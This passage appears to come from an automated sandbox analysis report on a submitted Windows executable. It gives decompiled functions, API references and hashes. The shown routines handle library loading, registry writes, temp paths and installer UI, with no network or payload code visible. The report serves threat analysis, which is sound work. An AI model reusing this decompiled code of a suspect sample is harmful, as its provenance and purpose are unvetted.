                                              0x00401c34
                                              0x00401c36
                                              0x00401c3f
                                              0x00401c47
                                              0x00401c4a
                                              0x00401c4a
                                              0x00401c53
                                              0x00000000
                                              0x00401be9
                                              0x00401bf0
                                              0x00401bf2
                                              0x00401bfa
                                              0x00401bfd
                                              0x00401c25
                                              0x00401c59
                                              0x00401c59
                                              0x00401bff
                                              0x00401c0d
                                              0x00401c15
                                              0x00401c18
                                              0x00401c18
                                              0x00401bfd
                                              0x00401c5c
                                              0x00401c5f
                                              0x00401c65
                                              0x00402849
                                              0x00402849
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                              • Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
                                              • Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                              • Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004057EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004057EE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                              0x004057ef
                                              0x00405806
                                              0x0040580e
                                              0x0040580e
                                              0x00405816

                                              APIs
                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
                                              • lstrcatA.KERNEL32(?,00409010), ref: 0040580E
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-823278215
                                              • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                              • Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
                                              • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                              • Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x424008 =  *0x424008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FE7(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                              0x00401f67
                                              0x00401f67
                                              0x00401f6c
                                              0x00401f73
                                              0x0040202f
                                              0x0040217a
                                              0x0040217a
                                              0x004028a1
                                              0x004028a4
                                              0x004028b0
                                              0x004028b0
                                              0x00401f82
                                              0x00401f8c
                                              0x00401f8f
                                              0x00401f9e
                                              0x00401fa8
                                              0x00401fac
                                              0x00402028
                                              0x00000000
                                              0x00402028
                                              0x00401fae
                                              0x00401fb8
                                              0x00401fbc
                                              0x00402000
                                              0x00401fbe
                                              0x00401fc1
                                              0x00401fc4
                                              0x00401ff4
                                              0x00401fc6
                                              0x00401fc9
                                              0x00401fd2
                                              0x00401fd4
                                              0x00401fd4
                                              0x00401fd2
                                              0x00401fc4
                                              0x00402008
                                              0x0040201d
                                              0x0040201d
                                              0x00000000
                                              0x00402008
                                              0x00401f98
                                              0x00401f9c
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2987980305-0
                                              • Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                              • Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
                                              • Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                              • Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				_t31 =  *0x424030 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a450) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a450 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x424008 =  *0x424008 +  *(_t37 - 4);
				return 0;
			}










                                              0x0040231a
                                              0x0040231f
                                              0x00402329
                                              0x00402333
                                              0x00402336
                                              0x00402346
                                              0x00402350
                                              0x00402357
                                              0x0040235f
                                              0x0040236d
                                              0x00402371
                                              0x0040237c
                                              0x0040237c
                                              0x00402380
                                              0x00402384
                                              0x0040238a
                                              0x0040238f
                                              0x0040238f
                                              0x00402393
                                              0x0040239f
                                              0x0040239f
                                              0x004023b8
                                              0x004023ba
                                              0x004023ba
                                              0x004023bd
                                              0x00402493
                                              0x00402493
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                                              • lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                                              • RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                                              • RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CloseCreateValuelstrlen
                                              • String ID:
                                              • API String ID: 1356686001-0
                                              • Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                              • Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
                                              • Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                              • Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b064 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b06b = 1;
				 *0x40b068 = _t11 & 0x00000001;
				 *0x40b069 = _t11 & 0x00000002;
				 *0x40b06a = _t11 & 0x00000004;
				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b054);
				_push(_t14);
				_push(_t26);
				E00405C59();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                              0x00401d29
                                              0x00401d42
                                              0x00401d4c
                                              0x00401d51
                                              0x00401d5c
                                              0x00401d63
                                              0x00401d75
                                              0x00401d7b
                                              0x00401d80
                                              0x00401d8a
                                              0x004024ce
                                              0x00401561
                                              0x00402849
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • GetDC.USER32(?), ref: 00401D22
                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                              • CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirect
                                              • String ID:
                                              • API String ID: 3272661963-0
                                              • Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                              • Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
                                              • Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                              • Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403A17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403A17(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C72(__ecx, "1033");
				while(1) {
					_t26 =  *0x423fc4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f90 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423fc0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423760 = _t18[1];
					 *0x424028 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42375c = _t23;
						E00405C59(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
						_t11 =  *0x423fac;
						_t27 =  *0x423fa8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                              0x00403a1b
                                              0x00403a20
                                              0x00403a26
                                              0x00403a2b
                                              0x00403a2b
                                              0x00403a33
                                              0x00000000
                                              0x00000000
                                              0x00403a3b
                                              0x00403a43
                                              0x00403a45
                                              0x00403a4b
                                              0x00403a4b
                                              0x00403a4d
                                              0x00403a59
                                              0x00000000
                                              0x00000000
                                              0x00403a5d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403a5f
                                              0x00403a64
                                              0x00403a6d
                                              0x00403a73
                                              0x00403a78
                                              0x00403a8c
                                              0x00403a97
                                              0x00403aaf
                                              0x00403ab5
                                              0x00403aba
                                              0x00403ac2
                                              0x00403ae3
                                              0x00403ae3
                                              0x00403ae3
                                              0x00403ac4
                                              0x00403ac6
                                              0x00403ac6
                                              0x00403aca
                                              0x00403ad1
                                              0x00403ad1
                                              0x00403ad6
                                              0x00403adc
                                              0x00403adc
                                              0x00000000
                                              0x00403ac6
                                              0x00403a7a
                                              0x00403a7f
                                              0x00403a88
                                              0x00403a81
                                              0x00403a81
                                              0x00403a81
                                              0x00403a7f

                                              APIs
                                              • SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: TextWindow
                                              • String ID: "C:\Users\user\Desktop\qHpeBvr9cR.exe"$1033
                                              • API String ID: 530164218-146464102
                                              • Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                              • Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
                                              • Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                              • Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404F37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420568 != _t22) {
							 *0x420568 = _t22;
							E00405CFB(0x420580, 0x425000);
							E00405C59(0x425000, _t22);
							E0040140B(6);
							E00405CFB(0x425000, 0x420580);
						}
						L11:
						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048B6(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404003(0x413);
				return 0;
			}




                                              0x00404f43
                                              0x00404f68
                                              0x00404f88
                                              0x00404f8b
                                              0x00404f8e
                                              0x00404fa5
                                              0x00404fab
                                              0x00404fb2
                                              0x00404fb9
                                              0x00404fc0
                                              0x00404fc5
                                              0x00404fcb
                                              0x00000000
                                              0x00404fdb
                                              0x00404f75
                                              0x00404fc8
                                              0x00404fc8
                                              0x00000000
                                              0x00404fc8
                                              0x00404f81
                                              0x00404f83
                                              0x00000000
                                              0x00404f83
                                              0x00404f49
                                              0x00000000
                                              0x00000000
                                              0x00404f50
                                              0x00000000

                                              APIs
                                              • IsWindowVisible.USER32 ref: 00404F6D
                                              • CallWindowProcA.USER32 ref: 00404FDB
                                                • Part of subcall function 00404003: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404015
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                              • Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
                                              • Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                              • Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004036B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004036B9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f53c;
				_t3 = E0040369E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f53c =  *0x41f53c & 0x00000000;
				return _t3;
			}







                                              0x004036ba
                                              0x004036c2
                                              0x004036c9
                                              0x004036cc
                                              0x004036cc
                                              0x004036ce
                                              0x004036d3
                                              0x004036da
                                              0x004036e0
                                              0x004036e4
                                              0x004036e5
                                              0x004036ed

                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,766DF560,00403690,00000000,00403482,00000000), ref: 004036D3
                                              • GlobalFree.KERNEL32 ref: 004036DA
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-823278215
                                              • Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                              • Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
                                              • Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                              • Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405835 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405835(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                              0x00405836
                                              0x00405840
                                              0x00405842
                                              0x00405849
                                              0x00405851
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405851
                                              0x00405853
                                              0x00405858

                                              APIs
